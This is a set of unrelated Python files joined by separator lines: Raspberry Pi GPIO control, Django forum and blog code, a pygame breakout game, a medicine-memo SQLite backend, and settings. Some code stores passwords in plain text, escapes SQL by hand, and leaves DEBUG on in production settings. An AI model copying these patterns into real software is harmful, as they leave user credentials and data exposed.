        return row
|
import RPi.GPIO as gpio
import time
import os
gpio.setmode(gpio.BCM)
gpio.setwarnings(False)
# gpio setup: pin 4 is the PWM output, pin 15 a pulled-up button input
gpio.setup(4,gpio.OUT)
gpio.setup(15,gpio.IN,pull_up_down = gpio.PUD_UP)
# pwm setup: 100 Hz on pin 4, starting at 0% duty cycle
pin = gpio.PWM(4,100)
pin.start(0)
try:
    while True:
        # Button is active-low (pull-up), so 0 means pressed.
        if gpio.input(15) == 0:
            # Wait 0.8s to distinguish a short press from a long hold.
            time.sleep(0.8)
            if gpio.input(15):
                # Released within 0.8s: play the sound effect and run the
                # PWM ramp sequence (slow rise, fast rise, slow fall).
                os.system("sudo mpg123 /home/pi/iron-man-repulsor.mp3 &")
                print(gpio.input(15))
                # Slow ramp 1 -> 75.
                x = 0
                while x < 75:
                    x = x + 1
                    pin.ChangeDutyCycle(x)
                    time.sleep(0.0052)
                # Fast ramp 74 -> 99.
                for i in range(74,100):
                    pin.ChangeDutyCycle(i)
                    time.sleep(0.00134)
                # Fade back down 99 -> 0.
                for o in range(100):
                    pin.ChangeDutyCycle(99 - o)
                    time.sleep(0.005)
            elif gpio.input(15) == 0:
                # Still held after 0.8s: release the pins and power off.
                gpio.cleanup()
                os.system("sudo shutdown -h now")
finally:
    print("done")
    gpio.cleanup()
|
from django.contrib.auth.models import User
from django.shortcuts import get_object_or_404, redirect, render

from .forms import NewTopicForm
from .models import Board, Post
def home(request):
    """Render the board index page with every board."""
    all_boards = Board.objects.all()
    return render(request, 'home.html', {'boards': all_boards})
def board_topics(request, pk):
    """List the topics of one board.

    Uses get_object_or_404 (consistent with new_topic below) so an unknown
    pk yields a 404 instead of an unhandled DoesNotExist (500).
    """
    board = get_object_or_404(Board, pk=pk)
    return render(request, 'topics.html', {'board': board})
def new_topic(request, pk):
    """Create a new topic (and its first post) on the given board."""
    board = get_object_or_404(Board, pk=pk)
    user = User.objects.first()  # TODO: use request.user once auth is wired up
    if request.method == 'POST':
        form = NewTopicForm(request.POST)
        if form.is_valid():
            # BUG FIX: form.save() immediately committed a Topic row without
            # its board/starter and then saved it a second time; commit=False
            # lets us fill those fields in before the single save.
            topic = form.save(commit=False)
            topic.board = board
            topic.starter = user
            topic.save()
            # Post must be imported from .models (it was referenced here
            # without an import, raising NameError on the first POST).
            Post.objects.create(
                message=form.cleaned_data['message'],
                topic=topic,
                created_by=user
            )
            return redirect('board_topics', pk=board.pk)
    else:
        form = NewTopicForm()
    return render(request, "new_topic.html", {'board': board, 'form': form})
|
from django.db import models
from django.contrib.auth.models import User
from users.models import User_more_info
from DjangoUeditor.models import UEditorField
# content = models.TextField()
class Article_type(models.Model):
    """An article category, optionally nested via a self-referencing parent."""
    id = models.AutoField(primary_key=True)
    # Category name
    name = models.CharField(max_length=150, unique=True, verbose_name="文章类别名称")
    # Category cover image
    cover = models.ImageField(upload_to='static/articles/type_cover', default="/static/type_cover/default.jpg", verbose_name="文章类配图")
    # Category description
    intro = models.TextField(verbose_name="文章类别描述")
    # Parent category (self-referencing; null for top-level categories)
    parent = models.ForeignKey('self', null=True, blank=True, verbose_name="父级类型", on_delete=models.CASCADE)
    def __str__(self):  # ____unicode____ on Python 2
        return self.name
class Article(models.Model):
    """An article with category, cover image, counters, and author linkage."""
    # Source of the article: original ('yuanchuang') or repost ('zhuanzai').
    FROM_CHOICES = (
        ('yuanchuang', '原创'),
        ('zhuanzai', '转载'),
    )
    id = models.AutoField(primary_key=True)
    title = models.CharField(max_length=66, null=False, verbose_name="文章标题")
    # Rich-text body edited with UEditor.
    content = UEditorField()
    # Summary shown in listings.
    zhaiyao = models.CharField(max_length=520, verbose_name="文章摘要")
    cover_img = models.ImageField(upload_to="static/articles/cover", verbose_name="文章封面图")
    # Tag string; NOTE(review): delimiter/format not evident here -- confirm.
    biaoqian = models.CharField(max_length=256, verbose_name="文章标签")
    create_time = models.DateTimeField(auto_now_add=True, verbose_name="创建时间")
    change_time = models.DateTimeField(auto_now=True, verbose_name="修改时间")
    article_from = models.CharField(max_length=16, choices=FROM_CHOICES, default='yuanchuang')
    article_type = models.ForeignKey(Article_type, on_delete=models.CASCADE, verbose_name="文章分类")
    # Read counter.
    count = models.IntegerField(default=0, verbose_name="阅读量")
    # Like counter.
    zan_num = models.IntegerField(default=0, verbose_name="点赞量")
    user = models.ForeignKey(User, on_delete=models.CASCADE, verbose_name="关联用户")
    user_more_info = models.ForeignKey(User_more_info, on_delete=models.CASCADE, verbose_name="关联用户更多信息")
    def __str__(self):
        return self.title
class Article_zan_log(models.Model):
    """A 'like' record linking a user to the article they liked."""
    id = models.AutoField(primary_key=True)
    link_user = models.ForeignKey(User, on_delete=models.CASCADE, verbose_name="关联用户")
    link_article = models.ForeignKey(Article, on_delete=models.CASCADE, verbose_name="关联文章")
    def __str__(self):
        return '{0}点赞了文章:{1}'.format(self.link_user, self.link_article)
# class Article_Count(models.Model):
# id = models.AutoField(primary_key=True)
# count = models.IntegerField(default=0, verbose_name="阅读量")
# link_article = models.OneToOneField(Article, on_delete=models.CASCADE)
class Article_pinglun(models.Model):
    """A comment on an article; replies self-reference via pinglun_parent."""
    id = models.AutoField(primary_key=True)
    content = models.TextField(verbose_name="评论内容")
    create_time = models.DateTimeField(auto_now_add=True, verbose_name="创建时间")
    # Related article
    article = models.ForeignKey(Article, on_delete=models.CASCADE, verbose_name="关联文章")
    # Related user
    user = models.ForeignKey(User, on_delete=models.CASCADE, verbose_name="关联用户")
    user_more_info = models.ForeignKey(User_more_info, on_delete=models.CASCADE, verbose_name="关联用户更多信息")
    # Self-reference: parent comment when this row is a reply
    pinglun_parent = models.ForeignKey('self', null=True, blank=True, on_delete=models.CASCADE, verbose_name="评论自关联父级")
class Favorites(models.Model):
    """A bookmark record: a user marking an article as a favorite."""
    id = models.AutoField(primary_key=True)
    user = models.ForeignKey(User, on_delete=models.CASCADE)
    favorites_articles = models.ForeignKey(Article, on_delete=models.CASCADE)
    create_time = models.DateTimeField(auto_now_add=True)
    def __str__(self):
        return '{0}收藏了文章:{1}'.format(self.user, self.favorites_articles)
|
#coding:utf-8
# Import the helper function
from utils import times
# Call it and report the result.  Parenthesized single-argument print
# behaves identically on Python 2 and 3.
a = "itsource "
b = 10
s = times(a, b)
print("The multiplication of {0} and {1} is: \n{2}".format(a, b, s))
|
from heuristics.Generic_Heuristic import Generic_Heuristic
from heuristics.Single_Start_Greedy import Single_Start_Greedy
from math import ceil, factorial
import sys
from copy import deepcopy
import numpy as np
class Multi_Start_Greedy(Generic_Heuristic):
    """Run Single_Start_Greedy once per starting node and collect the results."""
    def __init__(self):
        super().__init__()
        self.starts = None # list of starting nodes; populated via set_params()
        # Reused worker instance; configured before each batch of runs.
        self.greedy_worker = Single_Start_Greedy()
    def set_params(self, params):
        """Read the list of starting nodes from *params* (key 'starts')."""
        self.starts = params["starts"]
    def run_heuristic(self, params):
        """Run the greedy worker from each start node.

        Returns a dict mapping the string form of each start to that run's
        results.  The `precomputed` cache is threaded through successive
        worker runs so repeated ground truths are not re-evaluated.
        """
        precomputed = {} # a map from ground_truth -> best_phi, best_b, max_log_like for all we've ever seen
        multi_start_results = {}
        # NOTE(review): num_elements/optimization/optimization_params/weight
        # are presumably set on self by the Generic_Heuristic machinery --
        # confirm before relying on them here.
        self.greedy_worker.num_elements = self.num_elements
        self.greedy_worker.optimization = self.optimization
        self.greedy_worker.optimization_params = self.optimization_params
        self.greedy_worker.weight = self.weight
        for start in self.starts:
            self.greedy_worker.start = start
            # Stringified start acts as the result key.
            start_str = np.array_str(np.array(list(start), dtype=float))
            multi_start_results[start_str], precomputed = self.greedy_worker.run_heuristic({"precomputed":precomputed})
            print("Start = " , start_str, "attempted %d possible ground truths" % len(multi_start_results[start_str]))
        return multi_start_results
|
# Breakout-style game: setup section.
import random, time, pygame
# Set up the display canvas.
pygame.init()
width = 500
height = 300
window_size = ( width, height )
game_surface = pygame.display.set_mode(window_size)
# Colors.
color_black = ( 0, 0, 0 )
color_white = ( 255, 255, 255 )
# Text label font.
labelFont = pygame.font.SysFont("Helvetica", 18)
# Ball and racket rectangles (the ball is drawn as a circle in its rect).
ball_rect = pygame.Rect(0, 0, 28, 28)
ball_rect.center = (width/2, height-34)
racket_rect = pygame.Rect(0, height - 20, 60, 15)
racket_rect.x = width/2 - racket_rect.w/2
# One random color per brick column.
colors = []
for c in range(0,10):
    colors.append(( random.randint(100,240), random.randint(60,210), random.randint(30,180) ))
# 4 rows x 10 columns of bricks.
bricks = []
for r in range(0,4):
    for i in range(0,10):
        bricks.append(pygame.Rect(i*50, 70 + r*20, 48, 19))
# Initialize the movement vectors; the ball starts on a random diagonal.
ball_speed_vectors = [ [5, -5], [-5, -5] ]
ball_speed_vector = ball_speed_vectors[ random.randint(0,1) ]
racket_speed_vector = [0, 0]
# Indices into the speed vectors.
X = 0
Y = 1
balls = 10
running = True
paused = False
# Main game loop: handle events, advance the ball, and redraw each frame.
while running:
    for event in pygame.event.get():
        # Window close button: quit the program.
        if event.type == pygame.QUIT:
            running = False
        # BUG FIX: pygame.mouse.get_pressed() returns a tuple, which is
        # always truthy, so the game un-paused on *every* event; only a
        # real mouse click should resume play.
        if event.type == pygame.MOUSEBUTTONDOWN:
            paused = False
        # Keyboard: update the racket's movement vector.
        if event.type == pygame.KEYDOWN:
            paused = False
            if event.key == pygame.K_LEFT:
                racket_speed_vector = [-20, 0]
            if event.key == pygame.K_RIGHT:
                racket_speed_vector = [20, 0]
        if event.type == pygame.KEYUP:
            racket_speed_vector = [0, 0]
    # Redraw the background.
    game_surface.fill(color_black)
    # Draw the racket at its new position.
    racket_rect = racket_rect.move(racket_speed_vector)
    pygame.draw.rect(game_surface, color_white, racket_rect)
    # Draw the remaining bricks, colored by column.  (The stray
    # `c = c + 1` left over from the setup loop was removed.)
    for brick in bricks:
        color = colors[ round(brick.x / 50) ]
        pygame.draw.rect(game_surface, color, brick)
    # Advance the ball unless we're between lives.
    if not paused:
        ball_rect = ball_rect.move(ball_speed_vector)
        # BUG FIX: iterate over a copy -- removing from the list being
        # iterated skips the following brick.
        for brick in bricks[:]:
            if ball_rect.colliderect(brick):
                ball_speed_vector[Y] = -ball_speed_vector[Y]
                bricks.remove(brick)
        if ball_rect.colliderect(racket_rect):
            ball_speed_vector[Y] = -ball_speed_vector[Y]
        # Ball fell past the racket: lose a life and pause until a click/key.
        if ball_rect.bottom > height:
            balls = balls - 1
            ball_rect.center = (width/2, height-34)
            ball_speed_vector = ball_speed_vectors[ random.randint(0,1) ]
            paused = True
        # Bounce off the top and side walls.
        if ball_rect.top < 0:
            ball_speed_vector[Y] = -ball_speed_vector[Y]
        if ball_rect.left < 0 or ball_rect.right > width:
            ball_speed_vector[X] = -ball_speed_vector[X]
    pygame.draw.circle(game_surface, color_white, ball_rect.center, round(ball_rect.width/2))
    # Draw the remaining-balls label.
    label = labelFont.render("balls {0}".format(balls), True, color_white)
    labelPosition = ( 10, 10 )
    game_surface.blit(label, labelPosition)
    # Flip the display buffer.
    pygame.display.flip()
|
# -*- encoding: utf-8 -*-
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
import sqlite3
import json
import datetime
import time
import calendar
import base64
import threading
# SQL statements used throughout this module.
# NOTE(review): identifier casing is inconsistent (Memo/memo, User/user) --
# harmless for SQLite's case-insensitive identifiers, but verify before
# porting to another database.
memo_insert_sql = "insert into Memo (User, Date, Text, Image, medicine) values (?, ?, ?, ?, ?)"
memo_search_sql = "select * from Memo where User=? and Medicine=?"
memo_search_sql2 = "select * from Memo where User=?"
memo_position_search_sql = "select * from Memo where User=? and id=? and Medicine=?"
memo_delete_sql = "delete from memo where user=? and id=?"
memo_change_sql = "update memo set text=?, image=?, medicine=? where id=?"
register = "insert into User (Id, Password) values (?, ?)"
validation = "select * from User where id=?"
login = "select * from User where id=? and password=?"
medicine_add_sql = "insert into Medicine_name (User, medicine_name) values (?, ?)"
medicine_search_sql = "select * from Medicine_name where User = ?"
medicine_taking_sql = "select * from Medicine where User=? and Medicine_Name=? and Date >= ? and Date <= ?"
medicine_taken_sql = "insert into Medicine (User, Medicine_Name, Date) values (?, ?, ?)"
instant_report_add_sql = "insert into instant_report (hash_value, medicine_name, user_id) values (?, ?, ?)"
instant_report_search_sql = "select * from instant_report where hash_value = ?"
instant_report_delete_sql = "delete from instant_report where hash_value = ?"
# Module-wide connection/cursor shared across threads; `lock` serializes
# access (check_same_thread=False allows cross-thread use of sqlite3 objects).
conn = sqlite3.connect("CapsuleTimer.db", check_same_thread=False)
cur = conn.cursor()
lock = threading.Lock()
# Only for test
def change_DB(db):
    """Re-point the module-level connection and cursor at *db* (test helper)."""
    global conn, cur
    conn = sqlite3.connect(db, check_same_thread=False)
    cur = conn.cursor()
def instant_report_insert(hash_value, medicine_name, user_id):
    """Insert an instant-report row keyed by *hash_value*.

    Returns JSON {'result': 'Yes'} on success, or {'result': 'No'} when
    the hash or medicine name is empty.
    """
    if hash_value == "" or medicine_name == "":
        outcome = {'result': 'No'}
    else:
        lock.acquire()
        cur.execute(instant_report_add_sql, (hash_value, medicine_name, user_id))
        conn.commit()
        lock.release()
        outcome = {'result': 'Yes'}
    return json.dumps(outcome)
def instant_report_search(hash_value):
    """Look up one instant-report row by hash and return it as JSON.

    NOTE(review): raises IndexError when no row matches *hash_value*, and
    fetchall() runs after the lock is released even though the cursor is
    shared between threads -- both look unintended.
    """
    result = {}
    # `index` is unused; columns are assigned explicitly below.
    index = ["hash_value", "medicine_name", "user_id"]
    lock.acquire()
    cur.execute(instant_report_search_sql, (hash_value,))
    lock.release()
    data = cur.fetchall()[0]
    print data
    result["hash_value"] = data[1]
    result["medicine_name"] = data[2]
    result["user_id"] = data[3]
    print result
    return json.dumps(result)
def instant_report_delete(hash_value):
    """Delete the instant-report row for *hash_value*.

    Returns JSON {'result': 'Yes'|'No'}.
    NOTE(review): if execute/commit raises, the lock is never released.
    """
    result = {}
    try:
        lock.acquire()
        cur.execute(instant_report_delete_sql, (hash_value, ))
        conn.commit()
        lock.release()
        result['result'] = 'Yes'
    except Exception, e:
        print e
        result['result'] = 'No'
    return json.dumps(result)
def web_insert_memo(user, date, text="", image="", medicine_name=""):
    """Insert a memo row storing *image* verbatim (no file written to disk).

    Returns JSON {'result': 'Yes'}, or {'result': 'No'} when both text and
    image are empty.
    """
    if text == "" and image == "":
        outcome = {'result': 'No'}
    else:
        lock.acquire()
        cur.execute(memo_insert_sql, (user, date, text, image, medicine_name))
        conn.commit()
        lock.release()
        outcome = {'result': 'Yes'}
    return json.dumps(outcome)
def insert_memo(user, date, text="", image="", medicine_name=""):
    """Insert a memo and write its base64 *image* under ./image/.

    The DB stores the web path "/image/<user><timestamp>" while the decoded
    bytes are written to "./image/<user><timestamp>.jpeg".  Returns JSON
    {'result': 'Yes'|'No'}.
    NOTE(review): base64.decodestring was removed in Python 3.9
    (base64.decodebytes is the replacement) -- confirm the target runtime.
    """
    result = {}
    if text == "" and image == "":
        result['result'] = 'No'
    else:
        lock.acquire()
        cur.execute(memo_insert_sql, (user, date, text, "/image/"+user+datetime.datetime.fromtimestamp(date).strftime("%Y-%m-%d-%H-%M-%S"), medicine_name))
        conn.commit()
        lock.release()
        with open("./image/"+user+datetime.datetime.fromtimestamp(date).strftime("%Y-%m-%d-%H-%M-%S")+".jpeg", 'wb') as f:
            f.write(base64.decodestring(image))
        result['result'] = 'Yes'
    return json.dumps(result)
def search_memo(user, medicine_name):
    """Return all memos for *user*, optionally filtered by medicine name.

    Passing "*" as *medicine_name* returns memos for every medicine.
    Returns JSON {"memo": [ {...}, ... ]}.
    """
    result = {"memo": []}
    index = ["id", "user", "time", "text", "image", "medicine_name"]
    lock.acquire()
    if medicine_name == "*":
        cur.execute(memo_search_sql2, (user, ))
    else:
        cur.execute(memo_search_sql, (user, medicine_name))
    # BUG FIX: fetch while still holding the lock.  The cursor is shared
    # between threads, so releasing before fetchall() let another thread's
    # execute() clobber the pending result set.
    data = cur.fetchall()
    lock.release()
    for d in data:
        d = list(d)
        # Column 2 holds a unix timestamp; render it human-readable.
        d[2] = ''.join(datetime.datetime.fromtimestamp(d[2]).strftime('%Y-%m-%d %H:%M:%S'))
        result["memo"].append(dict(zip(index, d)))
    return json.dumps(result)
def search_memos(user, position, medicine_name):
    """Fetch a single memo by row id (*position*) for *user* and medicine.

    Returns the memo as a JSON object ({} when no row matches).
    """
    result = {}
    index = ["id", "user", "time", "text", "image", "medicine_name"]
    print memo_position_search_sql, user, position
    lock.acquire()
    cur.execute(memo_position_search_sql, (user, position, medicine_name))
    data = cur.fetchall()
    for d in data:
        d = list(d)
        # Column 2 holds a unix timestamp; render it human-readable.
        d[2] = ''.join(datetime.datetime.fromtimestamp(d[2]).strftime('%Y-%m-%d %H:%M:%S'))
        result = dict(zip(index, list(d)))
    lock.release()
    return json.dumps(result)
def delete_memo(user, position):
    """Delete memo *position* (row id) belonging to *user*.

    Returns JSON {'result': 'Yes'|'No'}.
    """
    result = {}
    try:
        lock.acquire()
        cur.execute(memo_delete_sql, (user, position))
        conn.commit()
        lock.release()
        result['result'] = 'Yes'
    # BUG FIX: narrowed from a bare `except:`, which also swallowed
    # KeyboardInterrupt and SystemExit.
    except Exception:
        result['result'] = 'No'
    return json.dumps(result)
def change_memo(user, position, text, image, medicine_name, date):
    """Update memo *position*: new text/medicine, and rewrite its image file.

    The DB stores the web path while the decoded base64 *image* is written
    to "./image/<user><timestamp>.jpeg".  Returns JSON {'result': 'Yes'|'No'}.
    NOTE(review): on failure the lock stays acquired -- likely a deadlock.
    """
    result = {}
    try:
        lock.acquire()
        cur.execute(memo_change_sql, (text, "/image/"+user+datetime.datetime.fromtimestamp(date).strftime("%Y-%m-%d-%H-%M-%S"), medicine_name, position))
        with open("./image/"+user+datetime.datetime.fromtimestamp(date).strftime("%Y-%m-%d-%H-%M-%S")+".jpeg", 'wb') as f:
            f.write(base64.decodestring(image))
        conn.commit()
        lock.release()
        result['result'] = 'Yes'
        print memo_change_sql, (text,medicine_name, position)
    except Exception, e:
        print e
        result['result'] = 'No'
    return json.dumps(result)
def user_validation(id):
    """Check whether *id* is free to register: JSON 'Yes' if unused, 'No' if taken."""
    lock.acquire()
    cur.execute(validation, (id,))
    data = cur.fetchall()
    lock.release()
    taken = len(data) > 0
    return json.dumps({'result': 'No' if taken else 'Yes'})
def user_register(id, password):
    """Insert a new user row; always reports JSON {'result': 'Yes'}."""
    lock.acquire()
    cur.execute(register, (id, password))
    conn.commit()
    lock.release()
    return json.dumps({'result': 'Yes'})
def user_login(id, password):
    """Check credentials: JSON {'result': 'Yes'} when a matching row exists.

    NOTE(review): passwords appear to be stored and compared in plain text.
    """
    result = {}
    lock.acquire()
    cur.execute(login, (id, password))
    data = cur.fetchall()
    lock.release()
    print data, len(data)
    if len(data) <= 0:
        result['result'] = 'No'
    else:
        result['result'] = 'Yes'
    return json.dumps(result)
def medicine_taking(user, medicine_name, from_date, to_date):
    """List intake records for a medicine between two 'YYYYMMDD' dates.

    Returns JSON {"record": [ {User, Medicine_Name, Date}, ... ]}.
    """
    index = ["User", "Medicine_Name", "Date"]
    result = {}
    result["record"] = []
    # 'YYYYMMDD' -> unix timestamp at midnight, minus 9 hours (presumably a
    # UTC+9 timezone adjustment -- TODO confirm).
    from_date = calendar.timegm(time.struct_time(time.strptime('%s-%s-%s' %(from_date[:4], from_date[4:6], from_date[6:]), '%Y-%m-%d'))) - 9*3600
    to_date = calendar.timegm(time.struct_time(time.strptime('%s-%s-%s' % (to_date[:4], to_date[4:6], to_date[6:]), '%Y-%m-%d'))) - 9 * 3600
    lock.acquire()
    cur.execute(medicine_taking_sql, (str(user), unicode(medicine_name), from_date, to_date))
    data = cur.fetchall()
    lock.release()
    for d in data:
        d = list(d)
        # Column 2 holds a unix timestamp; render it human-readable.
        d[2] = ''.join(datetime.datetime.fromtimestamp(d[2]).strftime('%Y-%m-%d %H:%M:%S'))
        result["record"].append(dict(zip(index, list(d))))
    return json.dumps(result)
def medicine_taken(user, medicine_name, date):
    """Record that *user* took *medicine_name* at unix time *date*; JSON {'result': 'Yes'}."""
    lock.acquire()
    cur.execute(medicine_taken_sql, (user, medicine_name, date))
    conn.commit()
    lock.release()
    return json.dumps({"result": "Yes"})
def medicine_add(user, medicine_name):
    """Register *medicine_name* for *user*; always reports JSON {'result': 'Yes'}."""
    lock.acquire()
    cur.execute(medicine_add_sql, (user, medicine_name))
    conn.commit()
    lock.release()
    return json.dumps({"result": "Yes"})
def medicine_search(user):
    """Return every medicine registered by *user* as JSON {"record": [...]}."""
    index = ["medicine_id", "User", "medicine"]
    lock.acquire()
    cur.execute(medicine_search_sql, (user, ))
    rows = cur.fetchall()
    lock.release()
    records = [dict(zip(index, list(row))) for row in rows]
    return json.dumps({"record": records})
|
def update(sql_statement, cursor, db):
    """Execute a write statement on *cursor* and commit it on connection *db*."""
    cursor.execute(sql_statement)
    db.commit()
def query_all(sql_statement, cursor):
    """Run *sql_statement* and return all rows, or an empty list when none matched.

    NOTE(review): relies on cursor.execute() returning a comparable row
    count (MySQLdb-style); sqlite3 cursors return the cursor itself.
    """
    rows_found = cursor.execute(sql_statement)
    if rows_found > 0:
        return list(cursor)
    return list()
def query_one(sql_statement, cursor):
    """Run *sql_statement* and return the first row, or an empty list when none matched.

    NOTE(review): same MySQLdb-style row-count assumption as query_all.
    """
    rows_found = cursor.execute(sql_statement)
    if rows_found > 0:
        return list(cursor)[0]
    return list()
def format_date(date):
    """Convert an ISO-style date (YYYY-MM-DD) to DD/MM/YYYY."""
    parts = str(date).split("-")
    return "{0}/{1}/{2}".format(parts[2], parts[1], parts[0])
def format_time(time):
    """Trim a time string (HH:MM:SS) down to HH:MM."""
    parts = str(time).split(":")
    return "{0}:{1}".format(parts[0], parts[1])
def filter_sql(data_string):
    """Backslash-escape single quotes for string-built SQL.

    NOTE(review): hand-rolled escaping is fragile; prefer parameterized
    queries where the driver supports them.
    """
    escaped = data_string.replace("'", "\\'")
    return escaped
|
from defaults import *
# Production-style settings: start from the shared defaults and override below.
# NOTE(review): DEBUG=True in a production settings file is unsafe if this
# actually serves production traffic -- confirm it is intentional.
DEBUG=True
COMPRESS_ENABLED=True
ALLOWED_HOSTS=['127.0.0.1', 'localhost', 'crackit.com']
# Use the production template directory in addition to per-app templates.
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, 'mocktest', 'templates_prod')],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
# Collected static files live one level above the project root.
STATIC_ROOT = os.path.join(PROJECT_ROOT, '../static_prod')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.